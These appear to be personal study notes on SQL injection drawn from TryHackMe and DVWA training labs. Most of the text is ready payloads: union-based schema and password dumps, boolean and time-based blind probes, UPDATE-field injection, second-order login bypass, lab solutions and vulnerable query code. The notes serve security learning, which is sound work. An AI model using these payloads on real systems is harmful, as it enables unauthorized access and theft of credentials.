https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet

Boolean based Injection :

?id=1' AND (ascii(substr((select database()),1,1))) = 115 --;

++++++

?id=1' AND (ascii(substr((select database()),2,1))) < 115 --+

Union-based SQL injection

resources: https://tryhackme.com/room/sqlibasics

Leveraging the UNION SQL operator.

UNION: combing 2 or more SELECT statements into a single result to return

things to determine :

https://stackoverflow.com/questions/3913620/get-all-table-names-of-a-particular-database-by-sql-query

  1. Table names since we already figure out the database used by selecting database().
' union SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND TABLE_SCHEMA='sqlitraining' -- //

1 union select null, TABLE_NAME, null,null from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqlitraining'
webeight

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a0a4b726-e497-4d93-921f-7a6711e7c67e/Untitled.png

  1. getting columns names by table names, in this case we want to use table 'users'
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'tableName';

'UNION SELECT NULL,NULL,NULL,NULL, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'users' -- //

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e7a862fe-6d05-4c42-b4fc-6c59b6b699ec/Untitled.png

'UNION SELECT NULL, fname, id, username,password from users -- //

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/9e634220-1fa7-4759-a68c-ec1b712cdf96/Untitled.png

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/d57758aa-dd53-4f0f-b880-0b6331650615/Untitled.png

DVWA

1' union SELECT NULL,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND TABLE_SCHEMA='dvwa' #

' UNION SELECT NULL, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'users' #

SQL Injection Blind

1' and IF(length(database())=3, SLEEP(5), "false")-- -

https://www.sisense.com/blog/sql-symbol-cheatsheet/

Brute Force: (bonus)

1' UNION SELECT NULL, NULL,NULL,NULL,NULL, NULL, NULL, NULL # —

1' union SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND TABLE_SCHEMA='dvwa' #

' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'users' '

1 union SELECT null,table_name,null,null FROM information_schema.tables--

SQL Injection

$query = "SELECT * FROM users WHERE username='" + $_POST["user"] + "' AND password= '" + $_POST["password"]$ + '";"

The safest solution for inline SQL comment is to use --<space><any character> such as -- - because if it is URL-encoded into --%20- it will still be decoded as -- -. For more information, see: https://blog.raw.pm/en/sql-injection-mysql-comment/

TryHackMe | SQL Injection Lab

SQL Injection 1: input Box Non-String

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID=10 AND password = 'ce5ca67...'

SOLUTION: 1 or 1=1— -

SQL Injection 2: Input Box String

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='10' AND password = 'ce5ca67...'
SOLUTION: 1' or '1'='1'-- -

SQL Injection 3 : Javascript Santitaization

function validateform() {
    var profileID = document.inputForm.profileID.value;
    var password = document.inputForm.password.value;

    if (/^[a-zA-Z0-9]*$/.test(profileID) == false || /^[a-zA-Z0-9]*$/.test(password) == false) {
        alert("The input fields cannot contain special characters");
        return false;
    }
    if (profileID == null || password == null) {
        alert("The input fields cannot be empty.");
        return false;
    }
}

SQL Injection 4 : Update

UPDATE <table_name> SET nickName='name', email='email' WHERE <condition>

#MySQL and MSSQL
',nickName=@@version,email='
# For Oracle
',nickName=(SELECT banner FROM v$version),email='
# For SQLite
',nickName=sqlite_version(),email='

subquery to fetch all the tables from database and place them into the nickName field. The subquery is enclosed inside parantheses. The group_concat() function is used to dump all the tables simultaneously.

',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='

The subquery is using the group_concat() function to dump all the information simultaneously, and the || operator is "concatenate" - it joins together the strings of its operands (sqlite.org).

',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable'),email='

',nickName=(SELECT group_concat(profileID || "," || name || "," || password || ":") from usertable),email='

Union Based Injection:

' UNION SELECT 1,group_concat(tbl_name) FROM sqlite_master-- -

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/536d3f96-8590-49a7-906f-b0010efbc3c1/Untitled.png

' Union select 1, group_concat(sql) from sqlite_master where name='users'-- -

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/f13f7285-32a2-4943-91e2-f61254c76544/Untitled.png

' union select 1, group_concat(password) from users-- -

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/f990630f-07ef-423c-87e8-8e6ad52a96e2/Untitled.png

Blind Injection:

guessing game.

SQLite:

SELECT password FROM users LIMIT 0,1    #THM{123123}
SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) #"T"
CAST(X'54' as Text)

#test out the password length
admin' AND length((SELECT password from users where username='admin'))==37-- -

#brute force guessing time.

admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = CAST(X'54' as Text)-- -

Vulnerable Notes

Parameterized Queries

INSERT INTO notes (username, title, note) VALUES (?, ?, ?)

SELECT title, note FROM notes WHERE username = '" + username + "'

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/4cca1c25-81a2-4bef-81cc-83976ead1b95/Untitled.png

Update Concatenates the username directly into the SQL query.

Placeholder for the password parameter.

UPDATE users SET password = ? WHERE username = '" + username + "'
#register 
admin' -- -

SELECT username, password FROM users WHERE id = ?
SELECT username, password FROM users WHERE id = 'admin' -- - '

Book title